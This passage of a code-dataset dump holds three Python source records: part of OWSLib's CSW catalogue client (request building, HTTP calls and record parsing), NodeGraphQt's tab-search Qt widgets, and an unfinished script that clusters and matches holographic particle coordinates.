{}\n\n        if self.exceptionreport is None:\n            self._parsetransactionsummary()\n            self._parseinsertresult()\n\n    def harvest(self, source, resourcetype, resourceformat=None, harvestinterval=None, responsehandler=None):\n        \"\"\"\n\n        Construct and process a Harvest request\n\n        Parameters\n        ----------\n\n        - source: a URI to harvest\n        - resourcetype: namespace identifying the type of resource\n        - resourceformat: MIME type of the resource\n        - harvestinterval: frequency of harvesting, in ISO8601\n        - responsehandler: endpoint to which the CSW should respond with its response\n\n        \"\"\"\n\n        # construct request\n        node0 = self._setrootelement('csw:Harvest')\n        node0.set('version', self.version)\n        node0.set('service', self.service)\n        node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n        etree.SubElement(node0, util.nspath_eval('csw:Source', namespaces)).text = source\n        etree.SubElement(node0, util.nspath_eval('csw:ResourceType', namespaces)).text = resourcetype\n        if resourceformat is not None:\n            etree.SubElement(node0, util.nspath_eval('csw:ResourceFormat', namespaces)).text = resourceformat\n        if harvestinterval is not None:\n            etree.SubElement(node0, 
util.nspath_eval('csw:HarvestInterval', namespaces)).text = harvestinterval\n if responsehandler is not None:\n etree.SubElement(node0, util.nspath_eval('csw:ResponseHandler', namespaces)).text = responsehandler\n\n self.request = node0\n\n self._invoke()\n self.results = {}\n\n if self.exceptionreport is None:\n val = self._exml.find(util.nspath_eval('csw:Acknowledgement', namespaces))\n if util.testXMLValue(val) is not None:\n ts = val.attrib.get('timeStamp')\n self.timestamp = util.testXMLValue(ts, True)\n id = val.find(util.nspath_eval('csw:RequestId', namespaces))\n self.id = util.testXMLValue(id)\n else:\n self._parsetransactionsummary()\n self._parseinsertresult()\n\n def get_operation_by_name(self, name):\n \"\"\"Return a named operation\"\"\"\n for item in self.operations:\n if item.name.lower() == name.lower():\n return item\n raise KeyError(\"No operation named %s\" % name)\n\n def getService_urls(self, service_string=None):\n \"\"\"\n\n Return easily identifiable URLs for all service types\n\n Parameters\n ----------\n\n - service_string: a URI to lookup\n\n \"\"\"\n\n urls = []\n for key, rec in list(self.records.items()):\n # create a generator object, and iterate through it until the match is found\n # if not found, gets the default value (here \"none\")\n url = next((d['url'] for d in rec.references if d['scheme'] == service_string), None)\n if url is not None:\n urls.append(url)\n return urls\n\n def _parseinsertresult(self):\n self.results['insertresults'] = []\n for i in self._exml.findall('.//' + util.nspath_eval('csw:InsertResult', namespaces)):\n for j in i.findall(util.nspath_eval('csw:BriefRecord/dc:identifier', namespaces)):\n self.results['insertresults'].append(util.testXMLValue(j))\n\n def _parserecords(self, outputschema, esn):\n if outputschema == namespaces['gmd']: # iso 19139\n for i in self._exml.findall('.//' + util.nspath_eval('gmd:MD_Metadata', namespaces)) or \\\n self._exml.findall('.//' + util.nspath_eval('gmi:MI_Metadata', namespaces)):\n val = i.find(util.nspath_eval('gmd:fileIdentifier/gco:CharacterString', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = MD_Metadata(i)\n for i in self._exml.findall('.//' + util.nspath_eval('gfc:FC_FeatureCatalogue', namespaces)):\n identifier = self._setidentifierkey(util.testXMLValue(i.attrib['uuid'], attrib=True))\n self.records[identifier] = FC_FeatureCatalogue(i)\n elif outputschema == namespaces['fgdc']: # fgdc csdgm\n for i in self._exml.findall('.//metadata'):\n val = i.find('idinfo/datasetid')\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = Metadata(i)\n elif outputschema == namespaces['dif']: # nasa dif\n for i in self._exml.findall('.//' + util.nspath_eval('dif:DIF', namespaces)):\n val = i.find(util.nspath_eval('dif:Entry_ID', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = DIF(i)\n elif outputschema == namespaces['gm03']: # GM03\n for i in self._exml.findall('.//' + util.nspath_eval('gm03:TRANSFER', namespaces)):\n val = i.find(util.nspath_eval('gm03:fileIdentifier', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = GM03(i)\n else: # process default\n for i in self._exml.findall('.//' + util.nspath_eval('csw:%s' % self._setesnel(esn), namespaces)):\n val = i.find(util.nspath_eval('dc:identifier', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = 
CswRecord(i)\n\n def _parsetransactionsummary(self):\n val = self._exml.find(util.nspath_eval('csw:TransactionResponse/csw:TransactionSummary', namespaces))\n if val is not None:\n rid = val.attrib.get('requestId')\n self.results['requestid'] = util.testXMLValue(rid, True)\n ts = val.find(util.nspath_eval('csw:totalInserted', namespaces))\n self.results['inserted'] = int(util.testXMLValue(ts))\n ts = val.find(util.nspath_eval('csw:totalUpdated', namespaces))\n self.results['updated'] = int(util.testXMLValue(ts))\n ts = val.find(util.nspath_eval('csw:totalDeleted', namespaces))\n self.results['deleted'] = int(util.testXMLValue(ts))\n\n def _setesnel(self, esn):\n \"\"\" Set the element name to parse depending on the ElementSetName requested \"\"\"\n el = 'Record'\n if esn == 'brief':\n el = 'BriefRecord'\n if esn == 'summary':\n el = 'SummaryRecord'\n return el\n\n def _setidentifierkey(self, el):\n if el is None:\n return 'owslib_random_%i' % random.randint(1, 65536)\n else:\n return el\n\n def _setrootelement(self, el):\n if etree.__name__ == 'lxml.etree': # apply nsmap\n return etree.Element(util.nspath_eval(el, namespaces), nsmap=namespaces)\n else:\n return etree.Element(util.nspath_eval(el, namespaces))\n\n def _setconstraint(self, parent, qtype=None, propertyname='csw:AnyText', keywords=[], bbox=None, cql=None,\n identifier=None):\n if keywords or bbox is not None or qtype is not None or cql is not None or identifier is not None:\n node0 = etree.SubElement(parent, util.nspath_eval('csw:Constraint', namespaces))\n node0.set('version', '1.1.0')\n\n if identifier is not None: # set identifier filter, overrides all other parameters\n flt = fes.FilterRequest()\n node0.append(flt.set(identifier=identifier))\n elif cql is not None: # send raw CQL query\n # CQL passed, overrides all other parameters\n node1 = etree.SubElement(node0, util.nspath_eval('csw:CqlText', namespaces))\n node1.text = cql\n else: # construct a Filter request\n flt = fes.FilterRequest()\n node0.append(flt.set(qtype=qtype, keywords=keywords, propertyname=propertyname, bbox=bbox))\n\n def _invoke(self):\n # do HTTP request\n\n request_url = self.url\n\n # Get correct URL based on Operation list.\n\n # If skip_caps=True, then self.operations has not been set, so use\n # default URL.\n if hasattr(self, 'operations'):\n caller = inspect.stack()[1][3]\n if caller == 'getrecords2':\n caller = 'getrecords'\n try:\n op = self.get_operation_by_name(caller)\n if isinstance(self.request, str): # GET KVP\n get_verbs = [x for x in op.methods if x.get('type').lower() == 'get']\n request_url = get_verbs[0].get('url')\n else:\n post_verbs = [x for x in op.methods if x.get('type').lower() == 'post']\n if len(post_verbs) > 1:\n # Filter by constraints. 
We must match a PostEncoding of \"XML\"\n for pv in post_verbs:\n for const in pv.get('constraints'):\n if const.name.lower() == 'postencoding':\n values = [v.lower() for v in const.values]\n if 'xml' in values:\n request_url = pv.get('url')\n break\n else:\n # Well, just use the first one.\n request_url = post_verbs[0].get('url')\n elif len(post_verbs) == 1:\n request_url = post_verbs[0].get('url')\n except Exception: # no such luck, just go with request_url\n pass\n\n if isinstance(self.request, str): # GET KVP\n self.request = '%s%s' % (bind_url(request_url), self.request)\n self.response = openURL(\n self.request, None, 'Get', timeout=self.timeout, auth=self.auth\n ).read()\n else:\n self.request = cleanup_namespaces(self.request)\n # Add any namespaces used in the \"typeNames\" attribute of the\n # csw:Query element to the query's xml namespaces.\n for query in self.request.findall(util.nspath_eval('csw:Query', namespaces)):\n ns = query.get(\"typeNames\", None)\n if ns is not None:\n # Pull out \"gmd\" from something like \"gmd:MD_Metadata\" from the list\n # of typenames\n ns_keys = [x.split(':')[0] for x in ns.split(' ')]\n self.request = add_namespaces(self.request, ns_keys)\n self.request = add_namespaces(self.request, 'ows')\n\n self.request = util.element_to_string(self.request, encoding='utf-8')\n\n self.response = http_post(request_url, self.request, self.lang, self.timeout, auth=self.auth)\n\n # parse result see if it's XML\n self._exml = etree.parse(BytesIO(self.response))\n\n # it's XML. Attempt to decipher whether the XML response is CSW-ish \"\"\"\n valid_xpaths = [\n util.nspath_eval('ows:ExceptionReport', namespaces),\n util.nspath_eval('csw:Capabilities', namespaces),\n util.nspath_eval('csw:DescribeRecordResponse', namespaces),\n util.nspath_eval('csw:GetDomainResponse', namespaces),\n util.nspath_eval('csw:GetRecordsResponse', namespaces),\n util.nspath_eval('csw:GetRecordByIdResponse', namespaces),\n util.nspath_eval('csw:HarvestResponse', namespaces),\n util.nspath_eval('csw:TransactionResponse', namespaces)\n ]\n\n if self._exml.getroot().tag not in valid_xpaths:\n raise RuntimeError('Document is XML, but not CSW-ish')\n\n # check if it's an OGC Exception\n val = self._exml.find(util.nspath_eval('ows:Exception', namespaces))\n if val is not None:\n raise ows.ExceptionReport(self._exml, self.owscommon.namespace)\n else:\n self.exceptionreport = None\n\n\nclass CswRecord(object):\n \"\"\" Process csw:Record, csw:BriefRecord, csw:SummaryRecord \"\"\"\n def __init__(self, record):\n\n if hasattr(record, 'getroot'): # standalone document\n self.xml = etree.tostring(record.getroot())\n else: # part of a larger document\n self.xml = etree.tostring(record)\n\n # check to see if Dublin Core record comes from\n # rdf:RDF/rdf:Description container\n # (child content model is identical)\n self.rdf = False\n rdf = record.find(util.nspath_eval('rdf:Description', namespaces))\n if rdf is not None:\n self.rdf = True\n record = rdf\n\n # some CSWs return records with multiple identifiers based on\n # different schemes. 
Use the first dc:identifier value to set\n # self.identifier, and set self.identifiers as a list of dicts\n val = record.find(util.nspath_eval('dc:identifier', namespaces))\n self.identifier = util.testXMLValue(val)\n\n self.identifiers = []\n for i in record.findall(util.nspath_eval('dc:identifier', namespaces)):\n d = {}\n d['scheme'] = i.attrib.get('scheme')\n d['identifier'] = i.text\n self.identifiers.append(d)\n\n val = record.find(util.nspath_eval('dc:type', namespaces))\n self.type = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:title', namespaces))\n self.title = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:alternative', namespaces))\n self.alternative = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:isPartOf', namespaces))\n self.ispartof = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:abstract', namespaces))\n self.abstract = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:date', namespaces))\n self.date = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:created', namespaces))\n self.created = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:issued', namespaces))\n self.issued = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:relation', namespaces))\n self.relation = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:temporal', namespaces))\n self.temporal = util.testXMLValue(val)\n\n self.uris = [] # list of dicts\n for i in record.findall(util.nspath_eval('dc:URI', namespaces)):\n uri = {}\n uri['protocol'] = util.testXMLValue(i.attrib.get('protocol'), True)\n uri['name'] = util.testXMLValue(i.attrib.get('name'), True)\n uri['description'] = util.testXMLValue(i.attrib.get('description'), True)\n uri['url'] = util.testXMLValue(i)\n\n self.uris.append(uri)\n\n self.references = [] # list of dicts\n for i in record.findall(util.nspath_eval('dct:references', namespaces)):\n ref = {}\n ref['scheme'] = util.testXMLValue(i.attrib.get('scheme'), True)\n ref['url'] = util.testXMLValue(i)\n\n self.references.append(ref)\n\n val = record.find(util.nspath_eval('dct:modified', namespaces))\n self.modified = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:creator', namespaces))\n self.creator = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:publisher', namespaces))\n self.publisher = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:coverage', namespaces))\n self.coverage = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:contributor', namespaces))\n self.contributor = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:language', namespaces))\n self.language = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:source', namespaces))\n self.source = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:rightsHolder', namespaces))\n self.rightsholder = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:accessRights', namespaces))\n self.accessrights = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:license', namespaces))\n self.license = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:format', namespaces))\n self.format = util.testXMLValue(val)\n\n self.subjects = []\n for i in record.findall(util.nspath_eval('dc:subject', namespaces)):\n self.subjects.append(util.testXMLValue(i))\n\n self.rights = []\n for i in record.findall(util.nspath_eval('dc:rights', 
namespaces)):\n self.rights.append(util.testXMLValue(i))\n\n val = record.find(util.nspath_eval('dct:spatial', namespaces))\n self.spatial = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('ows:BoundingBox', namespaces))\n if val is not None:\n self.bbox = ows.BoundingBox(val, namespaces['ows'])\n else:\n self.bbox = None\n\n val = record.find(util.nspath_eval('ows:WGS84BoundingBox', namespaces))\n if val is not None:\n self.bbox_wgs84 = ows.WGS84BoundingBox(val, namespaces['ows'])\n else:\n self.bbox_wgs84 = None\n","sub_path":"owslib/csw.py","file_name":"csw.py","file_ext":"py","file_size_in_byte":36985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13245433","text":"#!/usr/bin/python\nfrom NodeGraphQt import QtCore, QtWidgets,QtGui\n\nfrom NodeGraphQt.widgets.stylesheet import STYLE_TABSEARCH, STYLE_TABSEARCH_LIST, STYLE_QMENU\n\n\nclass TabSearchCompleter(QtWidgets.QCompleter):\n \"\"\"\n QCompleter adapted from:\n https://stackoverflow.com/questions/5129211/qcompleter-custom-completion-rules\n \"\"\"\n\n def __init__(self, nodes=None, parent=None):\n super(TabSearchCompleter, self).__init__(nodes, parent)\n self.setCompletionMode(self.PopupCompletion)\n self.setCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self._local_completion_prefix = ''\n self._using_orig_model = False\n self._source_model = None\n self._filter_model = None\n\n def splitPath(self, path):\n self._local_completion_prefix = path\n self.updateModel()\n\n if self._filter_model.rowCount() == 0:\n self._using_orig_model = False\n self._filter_model.setSourceModel(QtCore.QStringListModel([]))\n return []\n return []\n\n def updateModel(self):\n if not self._using_orig_model:\n self._filter_model.setSourceModel(self._source_model)\n\n pattern = QtCore.QRegExp(self._local_completion_prefix,\n QtCore.Qt.CaseInsensitive,\n QtCore.QRegExp.FixedString)\n self._filter_model.setFilterRegExp(pattern)\n\n def setModel(self, model):\n self._source_model = model\n self._filter_model = QtCore.QSortFilterProxyModel(self)\n self._filter_model.setSourceModel(self._source_model)\n super(TabSearchCompleter, self).setModel(self._filter_model)\n self._using_orig_model = True\n\n\nclass TabSearchWidget(QtWidgets.QLineEdit):\n\n search_submitted = QtCore.Signal(str)\n\n def __init__(self, parent=None, node_dict=None):\n super(TabSearchWidget, self).__init__(parent)\n self.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.setStyleSheet(STYLE_TABSEARCH)\n self.setMinimumSize(200, 22)\n self.setTextMargins(2, 0, 2, 0)\n self.hide()\n\n self._node_dict = node_dict or {}\n\n node_names = sorted(self._node_dict.keys())\n self._model = QtCore.QStringListModel(node_names, self)\n\n self._completer = TabSearchCompleter()\n self._completer.setModel(self._model)\n self.setCompleter(self._completer)\n\n popup = self._completer.popup()\n popup.setStyleSheet(STYLE_TABSEARCH_LIST)\n popup.clicked.connect(self._on_search_submitted)\n self.returnPressed.connect(self._on_search_submitted)\n\n def __repr__(self):\n return '<{} at {}>'.format(self.__class__.__name__, hex(id(self)))\n\n def _on_search_submitted(self, index=0):\n node_type = self._node_dict.get(self.text())\n if not node_type:\n model = self._completer.popup().model()\n text = model.data(model.index(0, 0))\n node_type = self._node_dict.get(text)\n\n if node_type:\n self.search_submitted.emit(node_type)\n\n self.close()\n self.parentWidget().clearFocus()\n\n def showEvent(self, event):\n super(TabSearchWidget, 
self).showEvent(event)\n self.setFocus()\n self.setText(\"\")\n self.completer().popup().show()\n self.completer().complete()\n\n def mousePressEvent(self, event):\n if not self.text():\n self.completer().complete()\n\n def set_nodes(self, node_dict=None):\n self._node_dict = {}\n for name, node_types in node_dict.items():\n if len(node_types) == 1:\n self._node_dict[name] = node_types[0]\n continue\n for node_id in node_types:\n self._node_dict['{} ({})'.format(name, node_id)] = node_id\n node_names = sorted(self._node_dict.keys())\n self._model.setStringList(node_names)\n self._completer.setModel(self._model)\n\n\nclass TabSearchMenuWidget(QtWidgets.QLineEdit):\n search_submitted = QtCore.Signal(str)\n\n def __init__(self, parent=None, node_dict=None):\n super(TabSearchMenuWidget, self).__init__(parent)\n self.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.setStyleSheet(STYLE_TABSEARCH)\n self.setMinimumSize(200, 22)\n self.setTextMargins(2, 0, 2, 0)\n\n self._node_dict = node_dict or {}\n if self._node_dict:\n self._generate_items_from_node_dict()\n\n self.SearchMenu = QtWidgets.QMenu()\n searchWidget = QtWidgets.QWidgetAction(self)\n searchWidget.setDefaultWidget(self)\n self.SearchMenu.addAction(searchWidget)\n self.SearchMenu.setStyleSheet(STYLE_QMENU)\n\n self._actions = []\n self._menus = {}\n self._searched_actions = []\n\n self.returnPressed.connect(self._on_search_submitted)\n self.textChanged.connect(self._on_text_changed)\n\n def __repr__(self):\n return '<{} at {}>'.format(self.__class__.__name__, hex(id(self)))\n\n def _on_text_changed(self,text):\n self._clear_actions()\n\n if not text:\n self._set_menu_visible(True)\n return\n\n self._set_menu_visible(False)\n\n self._searched_actions = [action for action in self._actions\\\n if text.lower() in action.text().lower()]\n\n self.SearchMenu.addActions(self._searched_actions)\n\n def _clear_actions(self):\n for action in self._searched_actions:\n self.SearchMenu.removeAction(action)\n self._searched_actions = []\n\n def _set_menu_visible(self,visible):\n for menu in self._menus.values():\n menu.menuAction().setVisible(visible)\n\n def _close(self):\n self._set_menu_visible(False)\n self.SearchMenu.setVisible(False)\n self.SearchMenu.menuAction().setVisible(False)\n\n def _show(self):\n self.SearchMenu.exec_(QtGui.QCursor.pos())\n self.setText(\"\")\n self.setFocus()\n self._set_menu_visible(True)\n\n def _on_search_submitted(self):\n action = self.sender()\n if type(action) is not QtWidgets.QAction:\n if len(self._searched_actions) > 0:\n action = self._searched_actions[0]\n else:\n self._close()\n return\n\n text = action.text()\n node_type = self._node_dict.get(text)\n if node_type:\n self.search_submitted.emit(node_type)\n\n self._close()\n\n def _generate_items_from_node_dict(self):\n node_names = sorted(self._node_dict.keys())\n node_types = sorted(self._node_dict.values())\n\n self._menus.clear()\n self._actions.clear()\n self._searched_actions.clear()\n\n for node_type in node_types:\n menu_name = \".\".join(node_type.split(\".\")[:-1])\n if menu_name not in self._menus.keys():\n new_menu = QtWidgets.QMenu(menu_name)\n new_menu.setStyleSheet(STYLE_QMENU)\n self._menus[menu_name] = new_menu\n self.SearchMenu.addMenu(new_menu)\n\n for name in node_names:\n action = QtWidgets.QAction(name, self)\n action.setText(name)\n action.triggered.connect(self._on_search_submitted)\n self._actions.append(action)\n\n menu_name = self._node_dict[name]\n menu_name = \".\".join(menu_name.split(\".\")[:-1])\n\n if menu_name in 
self._menus.keys():\n                self._menus[menu_name].addAction(action)\n            else:\n                self.SearchMenu.addAction(action)\n\n    def set_nodes(self, node_dict=None):\n        if not self._node_dict:\n            self._node_dict.clear()\n            for name, node_types in node_dict.items():\n                if len(node_types) == 1:\n                    self._node_dict[name] = node_types[0]\n                    continue\n                for node_id in node_types:\n                    self._node_dict['{} ({})'.format(name, node_id)] = node_id\n            self._generate_items_from_node_dict()\n\n        self._show()\n\n","sub_path":"NodeGraphQt/widgets/tab_search.py","file_name":"tab_search.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"435831558","text":"from scipy.spatial import distance_matrix\nfrom argparse import ArgumentParser\nimport numpy as np\nimport logging\nimport math\nimport time\nimport tqdm\nfrom collections import defaultdict\nimport pandas as pd\nimport joblib\nimport scipy.ndimage\nimport glob\nimport yaml\nimport os\n\n\nlogger = logging.getLogger(__name__)\n\n\nscale_x = 2.96e-06\nscale_y = 2.96e-06\nscale_z = 1.00e-06\nscale_d = 2.96e-06 * 0.0\n\n\nscales = [scale_x, scale_y, scale_z, scale_d]\n\n\nclass Threshold:\n\n    def __init__(self):\n        self.n = None\n\n    def load_dist_matrix(self, h_idx, coordinates):\n\n        vol = np.array(coordinates[h_idx], dtype=float)\n\n        \"\"\"apply the relevant scale transformation\"\"\"\n        vol[:, 0] *= scale_x\n        vol[:, 1] *= scale_y\n        vol[:, 2] *= scale_z\n        vol[:, 3] *= scale_d\n\n        self.vol = vol\n        self.dist_matrix = distance_matrix(vol, vol, p = 1)\n        self.n = self.dist_matrix.shape[0]\n\n    def search(self, threshold):\n        results = {}\n        for label in range(self.n):\n            \"\"\"Find experiments at or below the threshold\"\"\"\n            members = np.where(self.dist_matrix[label] <= threshold)[0]\n            results[label] = [x for x in members if x != label]\n        results = sorted([\n            [len(x), i, x] for (i, x) in results.items()\n        ])\n        return results # sorted(results, reverse=True)\n\n    def Cluster(self, threshold):\n        \"\"\"Use Leader clustering\"\"\"\n        true_singletons = []\n        false_singletons = []\n        clusters = []\n        seen = set()\n        for (size, experiment, members) in self.search(threshold):\n            if experiment in seen:\n                \"\"\"Can't use a centroid which is already assigned\"\"\"\n                continue\n            seen.add(experiment)\n            \"\"\"Figure out which ones haven't yet been assigned\"\"\"\n            unassigned = set(members) - seen\n            if not unassigned:\n                false_singletons.append(experiment)\n                continue\n            \"\"\"this is a new cluster\"\"\"\n            clusters.append((experiment, unassigned))\n            seen.update(unassigned)\n\n        seen = []\n        for a, b in clusters:\n            seen.append(a)\n            for c in b:\n                if c not in seen:\n                    seen.append(c)\n\n        not_clustered = set(range(self.n)) - set(seen)\n        return sorted(clusters, key=lambda x: -len(x[1])), list(not_clustered)\n\n
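\n# illustrative use of the Threshold/leader-clustering pass above; coordinates\n# is the per-hologram dict of [x, y, z, d] rows used throughout this script:\n#   t = Threshold()\n#   t.load_dist_matrix(h_idx, coordinates)\n#   clusters, unassigned = t.Cluster(0.001)  # threshold in the scaled coordinate units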
\ndef cluster_after_leader(clust):\n    clust_max_x = clust[:, 0] + clust[:, 3]\n    clust_min_x = clust[:, 0] - clust[:, 3]\n    clust_max_y = clust[:, 1] + clust[:, 3]\n    clust_min_y = clust[:, 1] - clust[:, 3]\n    dx = max(clust_max_x) - min(clust_min_x)\n    dy = max(clust_max_y) - min(clust_min_y)\n    size = int(np.ceil(max(dx, dy)))  # np.zeros below needs an integer shape\n    array = np.zeros((size, size))\n    for circle in clust:\n        x, y, z, d = circle\n        x -= min(clust_min_x)\n        y -= min(clust_min_y)\n        b, a = np.ogrid[-x:size-x, -y:size-y]\n        mask = a*a + b*b <= (d/2)**2\n        array[mask] = 1\n    arr, n = scipy.ndimage.label(array)\n    _centroid = scipy.ndimage.find_objects(arr)\n    particles = []\n    for k, particle in enumerate(_centroid):\n        xind = (particle[0].stop + particle[0].start) / 2.\n        yind = (particle[1].stop + particle[1].start) / 2.\n#        dind = max([\n#            abs(particle[0].stop - particle[0].start),\n#            abs(particle[1].stop - particle[1].start)\n#        ])\n        dind = 2 * ((arr == (k+1)).sum() / np.pi)**(1/2)  # diameter of a circle with the component's area\n        xind += min(clust_min_x)\n        yind += min(clust_min_y)\n        particles.append([xind, yind, dind])\n    # To get z, assign each input circle to its closest merged particle and average\n    particle_z = defaultdict(list)\n    for circle in clust:\n        d = [\n            distance(circle[:2], particle[:2]) for k, particle in enumerate(particles)\n        ]\n        matched = np.argwhere(np.array(d) == min(d))[0][0]\n        particle_z[matched].append(circle[2])\n    coordinates = []\n    for k, particle in enumerate(particles):\n        x, y, d = particle\n        coordinates.append([\n            x, y, np.mean(particle_z[k]), d\n        ])\n    return coordinates\n\ndef diameter_average(coors, centroid, clusters):\n    centroid = [coors[centroid]]\n    centroid += [coors[x] for x in clusters]\n    # try to cluster a second time; the merged particles are returned directly\n    return cluster_after_leader(np.array(centroid))\n\n\ndef distance(x, y):\n    return math.sqrt(sum([(scales[i] * x[i] - scales[i] * y[i])**2 for i, _ in enumerate(x)]))\n\n\ndef create_table(distance_threshold=0.001,\n                 true_coordinates=None,\n                 pred_coordinates=None,\n                 match=True):\n\n    mapping_table = defaultdict(list)\n    mapping_table[\"rmse\"] = {}\n    df_table = defaultdict(list)\n\n    if match:\n        holo_indices = list(set(list(true_coordinates.keys()) + list(pred_coordinates.keys())))\n    else:\n        holo_indices = pred_coordinates.keys()\n\n    for h_idx in tqdm.tqdm(sorted(holo_indices)):\n\n        logger.info(\n            f\"Starting hologram {h_idx} ...\")\n\n        if match:\n            if h_idx not in pred_coordinates:\n                if len(true_coordinates[h_idx]) != 0:\n                    for p in true_coordinates[h_idx]:\n                        mapping_table[h_idx].append([\" \".join(map(str, p)), None])\n                        x, y, z, d = list(map(float, p))\n                        df_table[\"h\"].append(h_idx)\n                        df_table[\"x_t\"].append(x)\n                        df_table[\"y_t\"].append(y)\n                        df_table[\"z_t\"].append(z)\n                        df_table[\"d_t\"].append(d)\n                        df_table[\"x_p\"].append(np.nan)\n                        df_table[\"y_p\"].append(np.nan)\n                        df_table[\"z_p\"].append(np.nan)\n                        df_table[\"d_p\"].append(np.nan)\n                        df_table[\"rmse\"].append(np.nan)\n                continue\n\n            if len(pred_coordinates[h_idx]) == 0:\n                for p in true_coordinates[h_idx]:\n                    mapping_table[h_idx].append([\" \".join(map(str, p)), None])\n                    x, y, z, d = list(map(float, p))\n                    df_table[\"h\"].append(h_idx)\n                    df_table[\"x_t\"].append(x)\n                    df_table[\"y_t\"].append(y)\n                    df_table[\"z_t\"].append(z)\n                    df_table[\"d_t\"].append(d)\n                    df_table[\"x_p\"].append(np.nan)\n                    df_table[\"y_p\"].append(np.nan)\n                    df_table[\"z_p\"].append(np.nan)\n                    df_table[\"d_p\"].append(np.nan)\n                    df_table[\"rmse\"].append(np.nan)\n                continue\n\n        \"\"\"Cluster particles using the distance matrix and threshold\"\"\"\n        start_time = time.time()\n        t = Threshold()\n        t.load_dist_matrix(h_idx, pred_coordinates)\n        clusters, unassigned = t.Cluster(distance_threshold)\n\n        \"\"\"Create numpy arrays from the centroids/unassigned\"\"\"\n        pred_r_centroids = []\n        for centroid, members in clusters:\n            results = diameter_average(pred_coordinates[h_idx], centroid, members)\n            pred_r_centroids += [np.array(x).astype(float) for x in results]\n        pred_r_centroids = np.array(pred_r_centroids)\n\n        #pred_r_centroids = np.array([diameter_average(\n        #    pred_coordinates[h_idx], centroid, members) for centroid, members in 
clusters]).astype(float)\n \n pred_r_not_matched = np.array(\n [pred_coordinates[h_idx][idx] for idx in unassigned]).astype(float)\n if pred_r_centroids.shape[0] > 0:\n if pred_r_not_matched.shape[0] > 0:\n pred_r = np.concatenate([pred_r_centroids, pred_r_not_matched])\n else:\n pred_r = pred_r_centroids\n else:\n pred_r = pred_r_not_matched\n ctime = time.time() - start_time\n\n logger.info(\n f\"... clustering completed in {ctime} s, {pred_r_centroids.shape[0]} clusters, {len(unassigned)} unassigned, {pred_r.shape[0]} total\")\n\n# with open(\"cluster_results.txt\", \"a+\") as fid:\n# fid.write(f\"{distance_threshold} {h_idx} {len(clusters)} {len(unassigned)} {pred_r.shape[0]}\\n\")\n \n if not match or not true_coordinates:\n mapping_table[h_idx] = [list(x) for x in pred_r]\n for coors in pred_r:\n x, y, z, d = list(coors)\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n continue\n\n \"\"\"\n Match the clustered particles against the true particles (if they exist)\n \"\"\"\n if len(true_coordinates[h_idx]) == 0:\n for p in pred_coordinates[h_idx]:\n mapping_table[h_idx].append([None, \" \".join(map(str, p))])\n x, y, z, d = p\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n \n logger.info(\n f\"... 
matched 0 particles\")\n \n continue\n \n else: \n true_r = np.array(true_coordinates[h_idx]).astype(float)\n\n \"\"\"Compute the distance matrix b/t the two datasets --> pandas df\"\"\"\n start_time = time.time()\n result_dict = defaultdict(list)\n for k1, x in enumerate(pred_r):\n for k2, y in enumerate(true_r):\n error = distance(x, y)\n result_dict[\"pred_id\"].append(k1)\n result_dict[\"true_id\"].append(k2)\n result_dict[\"pred_coor\"].append(\n \" \".join([str(xx) for xx in list(x)]))\n result_dict[\"true_coor\"].append(\n \" \".join([str(yy) for yy in list(y)]))\n result_dict[\"error\"].append(np.mean(np.abs(error)))\n df = pd.DataFrame(result_dict)\n\n \"\"\"Add to the mapping table\"\"\"\n pred_seen = []\n true_seen = []\n error = []\n while True:\n c1 = df[\"true_id\"].isin(true_seen)\n c2 = df[\"pred_id\"].isin(pred_seen)\n c = c1 | c2\n if c.sum() == df.shape[0]:\n break\n smallest_error = df[~c][\"error\"] == min(df[~c][\"error\"])\n error.append(list(df[~c][smallest_error][\"error\"])[0])\n true_id = list(df[~c][smallest_error][\"true_id\"])[0]\n pred_id = list(df[~c][smallest_error][\"pred_id\"])[0]\n 